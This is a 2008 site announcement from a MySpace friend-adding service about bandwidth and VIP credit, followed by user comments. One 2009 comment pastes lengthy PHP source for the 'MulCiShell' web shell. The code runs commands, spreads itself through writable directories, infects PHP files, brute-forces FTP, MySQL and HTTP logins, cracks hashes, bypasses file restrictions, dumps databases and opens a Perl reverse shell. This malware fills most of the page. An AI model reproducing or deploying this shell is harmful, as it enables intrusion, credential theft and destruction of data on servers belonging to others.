Home News Top Today Members Get VIP Help Message Board

Bandwidth and VIP

So last month was crazy and Candy Adds actually ran out of bandwidth for the last week of January. I got some complaints about people losing VIP.. So everyone that had VIP the last day the site was up (1-27) just got back the 5 days they lost plus an extra week. There shouldn't be any more bandwidth problems, and hopefully everyone is happy with an extra week free VIP :)

Posted on Feb. 2, 2008

Comments

BBcentral.org - MySpace famoust Sites 2.0k+ - 2008-02-03
aww, thats more i had expected, really nice move from you :) thanks

♥Captain_Krazie♥ {1.8k+} - 2008-02-11
Thanks so Much!! I was wondering how i got more than 2 days vip. I really appreciate it. peace

Hidden Kiss! [ln-kiss] - 2008-02-18
Awh, that was nice. But like i joined this awhile ago, and bought VIP but it says that i am a new member but im not and i typed in the correct friend id # several times. its just not working!

Pitsch - 2008-02-20
im gonna kill myself!!!!

Melany - 2008-02-20
My picture wont show up?? It has this weird HTML in its place. Can you fix that please? Its ruining people adding me. I'm getting ALOT of referrals today, so I wanna make sure my picture is fixed in time for my free vip :]

comment default. [¢¾] - 2008-03-04
grrr. i know i would be-lol

King Yroc - 2008-03-13
I think you should be able to add more than just 500 people a day, i could have like 22,000 friends, but i can only add 500 a day, even ads vip!

MHF. ¢¾ 8k+ - 2008-04-22
hey, all vanessa fans. i am the second biggest fansite for Vanessa on myspace, but with your help i could be the biggest. So if you want all the latest news, gossip, pictures and videos on Vanessa then add me now. i also have my own site model amy <- she only site models for me so come check her out too. i love making new friends and i always reply back to everyone¡¯s comments & messages. ;] so be sure to add me now, I can tell you now you will not regret the add. Lots of love lidia [miss. Hudgens fansite] xo <33

Popc0rn! - 2009-07-14
function togglecheck() { var cb=document.forms[0].check for (i in cb) { cb[i].checked=(cb[i].checked)?false:true; } } "; switch($access_control) #Break statements intentionally ommited { case 3: $ip_allwd=false; foreach($allowed_addrs as $addr) { if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;} if(!$ip_allwd) exit; } case 2: if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user||$_SERVER['PHP_AUTH_PW']!=$md5_pass) { header("WWW-Authenticate: Basic Realm=\"Restricted area\""); header("HTTP/1.1 401 Unauthorized"); echo "Wrong username/password"; exit; } case 1: if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit; } if($id) { $s=strpos($id,"(",0)+1; $e=strpos($id,")",$s); $idval=substr($id,$s,$e-$s); } $disable=@ini_get("disable_functions"); if(empty($disable)) $disable="None"; function rm_rep($dir,&$success,&$fail) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$rm=readdir($dh))) { if($rm=='.' || $rm=='..') continue; if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...
"; rm_rep($dir.'/'.$rm,$success,$fail); continue;} if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...
";} else {$fail++; echo "Failed to delete $rm
";} } @closedir($dh); } else echo "Failed to open dir $dir
"; } function chmod_rep($dir,&$success,&$fail,$mod_value) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$ch=readdir($dh))) { if($ch=='.' || $ch=='..') continue; if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch...
"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;} if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...
";} else {$fail++; echo "Failed to chmod $rm
";} } @closedir($dh); } else echo "Failed to open dir $dir
"; } #Complete these functions function spread_self($user,&$c=0,$d=0) { if(!$d) $dir="/home/$user/public_html/"; else $dir=$d; if(is_dir($dir)&&is_writable($dir)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); echo "[+] Shell copied to $dir.$f./mshell.php
"; $c++; } if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir
"; while((@$f=readdir($dh))) { if($f!="."&&$f!="..") { if(@is_dir($dir.$f)) { echo "[+] Spreading to dir $dir
"; if(@is_writable($dir.$f)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); echo "[+] Shell copied to $dir.$f./mshell.php
"; $c++; } $c+=spread_self($user,$c,$dir.$f.'/'); } } } } function copy_rep($dir,&$c) { } function backup_site() { if(!isset($_POST['busite'])) { echo "

The following tool will attempt to retrieve every file from the specified dir (including child dirs).
If successful, you will be prompted for a site backup download.
Note: Only readable files will be downloaded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source.
"; } } function infect_rep($dir,&$success,&$fail) { } function copy_dir($dir,$new_dir) { } ################################## function execmd($cmd,$d_functions="None") { if($d_functions=="None") {$ret=passthru($cmd); return $ret;} $funcs=array("shell_exec","exec","passthru","system","popen","proc_open"); $d_functions=str_replace(" ","",$d_functions); $dis_funcs=explode(",",$d_functions); foreach($funcs as $safe) { if(!in_array($safe,$dis_funcs)) { if($safe=="exec") { $ret=@exec($cmd); $ret=join("\n",$ret); return $ret; } elseif($safe=="system") { $ret=@system($cmd); return $ret; } elseif($safe=="passthru") { $ret=@passthru($cmd); return $ret; } elseif($safe=="shell_exec") { $ret=@shell_exec($cmd); return $ret; } elseif($safe=="popen") { $ret=@popen("$cmd",'r'); if(is_resource($ret)) { while(@!feof($ret)) $read.=@fgets($ret); @pclose($ret); return $read; } return -1; } elseif($safe="proc_open") { $cmdpipe=array( 0=>array('pipe','r'), 1=>array('pipe','w') ); $resource=@proc_open($cmd,$cmdpipe,$pipes); if(@is_resource($resource)) { while(@!feof($pipes[1])) $ret.=@fgets($pipes[1]); @fclose($pipes[1]); @proc_close($resource); return $ret; } return -1; } } } return -1; } $links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"=>"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode", "Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf", "Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill"); echo "MulCiShell v2.0"; switch($_SESSION['theme']) { case 'green': echo " "; break; case 'dark': echo ""; break; default: echo " "; break; } echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg=="); echo "
Server IPYour IPDisk spaceSafe_mode?Open_BaseDir?SystemServer softwareDisabled functionsIDShell location
$serv$addr$space of $total$safe_mode$open_basedir$uname$soft$disable$idval".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."

"; foreach($links as $val=>$addr) echo "[ $val ]"; echo "

"; if(isset($_POST['encryption'])) { $e=$_POST['encrypt']; echo "


Input:
"; } if(isset($_POST['dogetfile'])) execmd("wget $_POST[wgetfile]",$disable); if(isset($_POST['doUpload'])) { $dir=$_POST['u_location']; $name=$_FILES['u_file']['name']; switch($_FILES['u_file']['error']) { case 0: if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name)) echo "File uploaded successfully
"; else echo "Failed to upload file!"; } } if(isset($_POST['massfiles'])) { $fail=0; $success=0; switch($_POST['fileaction']) { case 'Infect': #Nothing special here, just kick them while they're down foreach($_POST['files'] as $file) { $ext=strrchr($file,'.'); if($ext!=".php") continue; @$fh=fopen($file,'a'); if(@is_resource($fh)) { $success++; @fwrite($fh,""); @fclose($fh); } else $fail++; } echo "Successfully infected $success files; failed to infect $fail files
Exploit files as such: file.php?e=php code"; break; case 'Delete': foreach($_POST['files'] as $file) { if(is_dir($file)) rm_rep($file,$success,$fail); else { if(@unlink(CleanDir($file))) { echo "File $file deleted
"; $success++; } else { echo "Failed to delete file $file
"; $fail++; } } } echo "Total files deleted: $success; failed to delete $fail files
"; break; case 'Chmod': foreach($_POST['files'] as $file) { if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']); if(@chmod(CleanDir($file),$_POST['cmodv'])) { echo "Changed mode for $file
"; $success++; } else { echo "Failed to change mode for $file
"; $fail++; } } echo "Total files modes modified: $success; failed to chmod $fail files
"; break; } } if(isset($_POST['docrack'])) { $con=true; $show=0; $list=@fopen($_FILES['wordlist']['tmp_name'],'r'); if(is_resource($list)) { if(isset($_POST['ftpcrack'])) { echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...
"; if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port']; else $port='3306'; if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout'])) $time=3; else $time=$_POST['ftp_timeout']; @$ftp=ftp_connect($_POST['ftp_host'],$port,$time); if(!$ftp) $con=false; if($con) { $show++; while(!feof($list)) { @$pass=fgets($list); if(ftp_login($ftp,$_POST['ftp_user'],trim($pass))) { echo "Password found! Password for $_POST[ftp_user] is $pass
"; @ftp_close($ftp); break; } if($show==10000){echo "Trying pass $pass...
"; $show=0;} } } else echo "Failed to connect!
"; } elseif(isset($_POST['remote_login'])) { //if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled."); /* $ch=curl_init($_POST['remote_login_target']); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,''); curl_exec($ch); */ if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL."); $path=explode('/',$_POST['remote_login_target']); $site=$path[0]; for($i=1;$i"; break; } if($show===10000) { $show=0; echo "Trying pass $pass...
"; } } echo "Complete
"; } elseif(isset($_POST['mysqlcrack'])) { $host=$_POST['mysql_host']; $user=$_POST['mysql_user']; if(!empty($_POST['mysql_port'])) $host.=":$_POST[mysql_port]"; while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(@mysql_connect($host,$user,$pass)) { echo "Password found! Password for $user is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } elseif(isset($_POST['authcrack'])) { $arr=explode('/',$_POST['auth_url']); $con_url=$arr[0]; if(empty($_POST['auth_url'])) die("Enter a target first..."); for($i=1;$i5000) {$show=0; echo $pass;} $encode=base64_encode(trim($_POST['auth_user']).':'.$pass); $header="GET $path HTTP/1.1\r\n"; $header.="Host: $con_url\r\n"; $header.="Authorization: Basic $encode\r\n"; $header.="Connection: Close\r\n\r\n"; fputs($conn_url,$header,strlen($header)); $tmp++; while(!feof($conn_url)) { $tmp=fgets($conn_url); if(preg_match("/HTTP\/\d+\.\d+ 200+/",$tmp)) { echo "Password found! Password=$pass

"; break 2; } } } } echo "Done
"; } elseif(isset($_POST['md5crack'])) { if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one ;)"); $md5=trim($_POST['md5hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(md5($pass)===$md5) { echo "Password found! Plaintext for $md5 is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } elseif(isset($_POST['sha1crack'])) { if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one ;)"); $sha1=trim($_POST['sha1hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(sha1($pass)===$sha1) { echo "Password found! Plaintext for $sha1 is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } } @fclose($list); } if(isset($_POST['port_scan'])) { switch($_POST['type']) { case 'php': extract($_POST); while($sport<=$eport) { echo "Trying port $sport"; if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open
"; $sport++; } break; default: echo "Invalid request
"; } } if(isset($_POST['find_forums'])) { echo "
[ Forum locator ]


"; $found=0; global $int_paths; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html"; if(@is_dir($path)) { foreach($int_paths as $forum_path) { $full_path=$path."/$forum_path/"; if(@is_dir($full_path)) { echo "[+] Forum found: Path: $full_path
"; $found++; continue; } } } } echo "Scan complete. Found $found forums

"; } function find_configs($path,&$found) { if(@file_exists($path.'config.php')) { echo "Found config file: $path"."config.php
"; $found++; } @$dh=opendir($path); while((@$file=readdir($dh))) if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/',$found); @closedir($dh); } if(isset($_POST['find_configs'])) { $found=0; echo "
[ Config locator ]


"; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html/"; find_configs($path,$found); } @fclose($fp); echo "Scan complete. Found $found configs

"; } if(isset($_POST['execmd'])) {echo "
";} if(isset($_POST['execphp'])) {echo "
";} if(isset($_POST['cnewfile'])) { if(@fopen($_POST['newfile'],'w')) echo "File created
"; else echo "Failed to create file
"; } if(isset($_POST['cnewdir'])) { if(@mkdir($_POST['newdir'])) echo "Directory created
"; else echo "Failed to create directory
"; } if(isset($_POST['doeditfile'])) FileEditor(); switch($_GET['act']) { case 'backc': if(!isset($_POST['backconnip'])) { echo "
Address: Port:

Listen with netcat by executing 'nc -l -n -v -p 1337'

Note: Be sure to foward your port first
"; } else { if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port"); if(is_writable(".")) { @$fh=fopen(getcwd()."/bc.pl",'w'); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...
"; execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable); if(!@unlink(getcwd()."/bc.pl")) echo "Warning: Failed to delete reverse-connection program
"; } else { @$fh=fopen("/tmp/bc.pl","w"); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...
"; if(!@unlink("/tmp/bc.pl")) echo "

Warning: Failed to delete reverse-connection program<

/font>
"; } } break; case 'dbs': database_tools(); break; case 'sql': SQLLogin(); break; case 'sqledit': SQLEditor(); break; case 'download': SQLDownload(); break; case 'tools': show_tools(); break; case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.
"; break; case 'f': FileEditor(); break; case 'encode':Encoder(); break; case 'bypass':security_bypass(); break; case 'bf':brute_force(); break; case 'bh': BackDoor(); break; case 'spread': if(!isset($_POST['spread_shell'])) { echo "
This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.
Passwd file:
"; } else { $s=0; @$file=fopen($_POST['passwd_file'],'r'); if(is_resource($file)) { while(!feof($file)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($file)); spread_self($user,$s); } @fclose($file); } echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times
":"Failed to spread the shell.
"; } break; case 'domains': $header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\n"; $header.="Host: searchy.protecus.de\r\n"; $header.="Connection: Close\r\n\r\n"; $domain_handle=fsockopen("searchy.protecus.de",80); @fputs($domain_handle,$header,strlen($header)); while(@!feof($domain_handle)) { echo fgets($domain_handle); } break; case 'kill': if(!isset($_POST['justkill'])) { echo "
Do you *really* want to kill the shell?

"; } else { if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.
"; else echo "Failed to delete shell
"; } break; case 'sec': $mysql_on=function_exists("mysql_connect")?"ON":"OFF"; $curl_on=function_exists("curl_init")?"ON":"OFF"; $magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF"; $register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON"; $include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled"; $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; $ver=phpversion(); echo "
Security overview
"; "
PHP VersionSafe modeOpen_BasedirMagic_QuotesRegister globals Remote includesRead /etc/passwd?MySQLcURL
$ver$safe_mode$open_basedir$magic_quotes_on$register_globals_on$include_on $etc_passwd$mysql_on$curl_on
"; break; case 'enum': $windows=0; $path=CleanDir(getcwd()); if(!eregi("Linux",php_uname())) {$windows=1;} if(!$windows) { $spath=str_replace("/home/","$serv/~",$path); $spath=str_replace("/public_html/","/",$spath); $URL="http://$spath/".basename($_SERVER['PHP_SELF']); echo "Enumerated shell link: $URL"; } else echo "Enumeration failed
"; break; } echo "
"; if(isset($_POST['sqlquery'])) { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_POST['db'])) @mysql_select_db($_POST['db']); $post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error()); $affected=@mysql_num_rows($post_query); echo "Affected rows: $affected
"; } } $dirs=array(); $files=array(); if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");} else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");} $current=explode("/",$d); echo "
Current location: ";for($p=0;$p$current[$p]/"; } echo "
"; if(isset($_GET['d'])) echo ""; else echo ""; echo ""; while(($f=@readdir($dh))) { if(@is_dir($d.'/'.$f)) $dirs[]=$f; else $files[]=$f; } asort($dirs); asort($files); @closedir($dh); foreach($dirs as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; $size="DIR"; @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),2); @$write=is_writable($d.'/'.$f)?"Yes":"No"; $mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); if($f==".") {continue;} elseif($f=="..") { $f=Trail($d.'/'.$f); echo ""; continue; } echo ""; } foreach($files as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; @$size=TrueSize(filesize($d.'/'.$f)); @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),3); @$write=is_writable($d.'/'.$f)?"Yes":"No"; @$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); echo ""; } echo "
FileSizeOwner/groupPermsWritableModifiedAction
..$size$own/$grp$ch$write$modNone
$f$size$own/$grp$ch$write$mod
$f$size$own/$grp$ch$write$mod

With checked file(s):
"; function SQLLogin() { global $self; if(!isset($_SESSION['log'])&&!isset($_POST['mconnect'])) { echo "
Host: Username: Password: Port:
"; } elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect'])) { extract($_POST); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { $_SESSION['muser']=$muser; $_SESSION['mhost']=$mhost; $_SESSION['mpass']=$mpass; $_SESSION['mport']=$mport; $_SESSION['log']=true; header("Location: $self?act=sqledit"); } else echo "Failed to login with $muser@$mhost!
"; } else { header("Location: $self?act=sqledit"); } } function SQLEditor() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { echo "Logged in as $muser@$mhost [Logout]
"; echo "
Quick SQL query:
"; echo "


"; if(isset($_POST['sql_list_proc'])) { $res=mysql_list_processes(); echo ""; while($r=mysql_fetch_assoc($res)) echo ""; mysql_free_result($res); echo "
Proc IDHostDBCommandTime
$r[Id]$r[Host]$r[db]$r[Command]$r[Time]

"; } if(!isset($_GET['db'])) { if(isset($_POST['dbc'])) db_create(); if(isset($_GET['dropdb'])) SQLDrop(); echo ""; $all_your_base=mysql_list_dbs($conn); while($your_base=mysql_fetch_assoc($all_your_base)) { $tbl=mysql_query("SHOW TABLES FROM $your_base[Database]"); $tbl_count=mysql_num_rows($tbl); echo ""; } echo "
DatabaseTable countDownloadDrop
$your_base[Database]$tbl_countDownloadDrop

New database name:

"; } elseif(isset($_GET['db'])&&!isset($_GET['tbl'])) { if(isset($_POST['tblc'])) table_create(); if(isset($_GET['droptbl'])) SQLDrop(); echo ""; $tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($tblc=mysql_fetch_array($tables)) { $fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]"); $fc=mysql_num_rows($fCount); echo ""; } echo "
TableColumn countDumpDrop
$tblc[0]$fcDumpDrop

Create new table:
"; } elseif(isset($_GET['field'])&&isset($_POST['sqlsave'])) { $discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $values=mysql_fetch_assoc($discard_values); $keys=array_keys($values); $values=array(); foreach($_POST as $k=>$v) if(in_array($k,$keys)) $values[]=$v; $query="UPDATE $_GET[db].$_GET[tbl] SET "; for($y=0;$yTable updated!
"; echo "Go back

"; } elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del'])) { echo "
"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($field=mysql_fetch_assoc($fields)) $sql_fields[]=$field['Field']; $data=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $d_piece=mysql_fetch_assoc($data); for($m=0;$m
"; } echo "
"; } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { if(isset($_GET['insert'])) SQLInsert(); if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del'])) { echo "
"; if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]=$_GET[v]")) echo "Row deleted
"; else echo "Failed to delete row
"; echo "
"; } echo "
[Insert new row]
"; echo ""; $cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); $fields=array(); while($col=mysql_fetch_assoc($cols)) { array_push($fields,$col['Field']); echo ""; } echo ""; if(isset($_GET['s'])&&is_numeric($_GET['s'])) {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");} else {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");} while($select=mysql_fetch_row($selector)) { echo ""; for($i=0;$i".htmlspecialchars($select[$i]).""; } echo ""; echo ""; } echo "
$col[Field]
EditDelete
"; echo ""; if(isset($_GET['s'])) { $prev=intval($_GET['s'])-250; $next=intval($_GET['s'])+250; if($_GET['s']>0) echo ""; if(mysql_num_rows($selector)>249) echo ""; } else echo "
Next
"; echo "
PreviousNext
"; } else { $_SESSION=array(); session_destroy(); header("Location: $self?act=sql"); } } } function SQLDownload() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_GET['db'])&&!isset($_GET['tbl'])) { $tables=array(); $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################\n\n"; $get_tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($current_table=mysql_fetch_array($get_tables)) $tables[]=$current_table[0]; foreach($tables as $table_dump) { $data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump"); while($current_data=mysql_fetch_assoc($data_selection)) { $fields=implode("`, `", array_keys($current_data)); $values=implode("`, `",array_values($current_data)); $dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); "; } } } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################\n"; $table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]"); while($table_data=mysql_fetch_assoc($table_dump)) { $fields=implode("`, `",array_keys($table_data)); $values=implode("`, `",array_values($table_data)); $dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n"; } } else { echo "Invalid!"; } } $dump_file.="########################################################################################"; if(!isset($_GET['tbl'])) $file_name="$_GET[db]"."_DUMP.sql"; else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql"; ob_get_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($dump_file)); header("Content-disposition: attachment; filename=$file_name;"); echo $dump_file; exit; } function SqlInsert() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_POST['sql_insert'])) { echo "
"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; for($s=0;$s
"; echo "
"; } else { $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; $values=array(); $keys=array(); $query="INSERT INTO $_GET[db].$_GET[tbl] ("; foreach($_POST as $k=>$v) { if(in_array($k,$sql_fields)&&!empty($v)) { $values[]=$v; $keys[]=$k; } } for($k=0;$k"; if(@mysql_query($query)) echo "Row inserted
"; else echo "Failed to insert row
"; echo ""; } } } function SQLDrop() { echo "
"; extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_GET['droptbl'])) { $query="DROP DATABASE $_GET[dropdb]"; if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropped
"; else echo "Failed to drop database $_GET[dropdb]
"; } elseif(isset($_GET['db'])&&isset($_GET['droptbl'])) { $query="DELETE FROM $_GET[db].$_GET[droptbl]"; if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped
"; else echo "Failed to drop table $_GET[droptbl]
"; } else { echo "Invalid request
"; } } else echo "Failed to connect
"; echo "
"; } function db_create() { echo "
"; if(isset($_POST['db_name']) && !empty($_POST['db_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Database $_POST[db_name] created!"; else echo "Failed to create database $_POST[db_name]
"; } else echo "Failed to connect
"; } else echo "Enter a DB name
"; echo ""; } function table_create() { echo "
"; if(isset($_POST['table_name'])&&!empty($_POST['table_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { @mysql_select_db($_POST['db_current']); if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!"; else echo "Failed to create table $_POST[table_name]"; } else echo "Failed to connect!
"; } else echo "Enter a table name
"; echo "
"; } function FileEditor() { if(isset($_GET['file'])) $file=$_GET['file']; elseif(isset($_POST['nfile'])) $file=$_POST['nfile']; elseif(isset($_POST['editfile'])) $file=$_POST['editfile']; if(@!file_exists($file)) die("Permission denied!"); if(isset($_POST['dfile'])) { @$fh=fopen($file,'r'); @$buffer=fread($fh,filesize($file)); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($buffer)); header("Content-disposition: attachment; filename=".basename($file).';'); @ob_get_clean(); echo $buffer; @fclose($fh); } elseif(isset($_POST['delfile'])) { if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!
"; else echo "File deleted
"; } elseif(isset($_POST['sfile'])) { $fh=@fopen($file,'w') or die("Failed to open file for editing!"); @fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_contents'])); echo "File saved!"; @fclose($fh); } else { $fh=@fopen($file,'r'); echo "
File to edit:

"; echo "

"; echo "
"; @fclose($fh); } } function security_bypass() { if(isset($_POST['curl_bypass'])) { $ch=curl_init("file://$_POST[file_bypass]"); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo "

"; } elseif(isset($_POST['tmp_bypass'])) { tempnam("/home/",$_POST['file_passwd']); } elseif(isset($_POST['copy_bypass'])) { if(@copy($_POST['file_bypass'],$_POST['dest'])) { echo "File successfully copied!
"; @$fh=fopen($_POST['dest'],'r'); echo "

"; @fclose($fh); } else echo "Failed to copy file
"; } elseif(isset($_POST['include_bypass'])) { if(file_exists($_POST['file_bypass'])) { echo ""; } } elseif(isset($_POST['sql_bypass'])) { extract($_SESSION); $conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { mysql_select_db($_POST['sql_db']); mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);"); mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST[tmp_table]") or die(mysql_error()); $res=mysql_query("SELECT * FROM $_POST[tmp_table]"); if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!"); if($res) { while($row=mysql_fetch_array($res)) $f.="$row[0]
"; echo $f; } mysql_query("DROP TABLE $_POST[tmp_table]"); } } echo "
Security (open_basedir) bypassers
Bypass using cURLBypass using tempnam()
Read file:
Write file:
Bypass using copy()Bypass using include()
Copy to:
File to copy:
Path to file:
Bypass using SQL LOAD INFILE [Login to SQL server first]
[Existing] Database to store temporary table:
Temporary table:
"; } function brute_force() { echo "

Password crackers
MD5 CrackerSHA1 Cracker
Hash: Hash:
VBulletin Salt CrackerSMF Salt cracker
Hash:
Salt:
Hash:
Salt:
MySQL Brute ForceFTP Brute Force
User:
Host:
Port:
User:
Host:
Port:
Timeout:
Remote login Brute ForceHTTP-Auth Brute Force
Login form:
Username: 		Username:
Auth URL:
Wordlist


Notice: Be sure to check the max POST length allowed
"; } function BackDoor() { global $backdoor_perl; global $disable; if(!isset($_POST['backdoor_host'])) { echo "
Port:
